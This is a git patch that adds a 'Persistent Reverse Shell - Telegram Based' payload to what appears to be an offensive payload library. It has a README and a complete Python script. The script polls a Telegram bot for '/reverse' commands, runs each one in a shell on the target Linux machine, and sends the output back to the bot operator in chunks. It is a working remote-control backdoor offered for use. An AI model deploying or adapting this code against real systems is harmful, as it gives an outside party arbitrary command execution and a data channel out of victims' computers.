From 5632b8fdc5d45efb39bff04742dc909bef759b22 Mon Sep 17 00:00:00 2001 From: aleff-github Date: Thu, 3 Aug 2023 10:22:32 +0200 Subject: [PATCH] payload --- .../README.md | 41 ++++++++++++++++++ .../connection.py | 43 +++++++++++++++++++ 2 files changed, 84 insertions(+) create mode 100644 payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md create mode 100644 payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md new file mode 100644 index 0000000..ff357e6 --- /dev/null +++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md @@ -0,0 +1,41 @@ +# Persistent Reverse Shell - Telegram Based + +A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot. + +**Category**: Execution + +## Dependencies + +* Internet Connection + +## Description + +A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot. + +This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection. + +The script accept the `/reverse` command using the format `/reverse ` and split `/reverse` from `` trough the `extract_command()` function, then execute the command acquired acquiring the output trough the function `run_command()`. + +Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot. + +## Credits + +

Aleff :octocat:

+
+ + + + + +
+ + + +
Github + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py new file mode 100644 index 0000000..bcb3677 --- /dev/null +++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py @@ -0,0 +1,43 @@ +from telebot import TeleBot, types +import subprocess + +# Set here the Telegram bot token +BOT_TOKEN = "" +bot = TeleBot(BOT_TOKEN) + +commands = [ + types.BotCommand("/reverse", "/reverse ") +] + +bot.set_my_commands(commands=commands) + +@bot.message_handler(commands=['reverse']) +def reverse_shell(message): + command = extract_command(message.text) + if command != "": + print(f"Command received: {command}") + out = run_command(command) + if len(out) > 1000: + bot.reply_to(message, "Message too long...") + chunk_size = 1000 + for i in range(0, len(out), chunk_size): + bot.send_message(message.chat.id, out[i:i+chunk_size]) + else: + bot.reply_to(message, out) + +def extract_command(message): + command_prefix = "/reverse" + if message.startswith(command_prefix): + return message[len(command_prefix):].strip() + else: + return None + +def run_command(command): + try: + result = subprocess.check_output(command, shell=True, text=True) + return result.strip() + except subprocess.CalledProcessError as e: + return f"Some error: {e}" + + +bot.infinity_polling()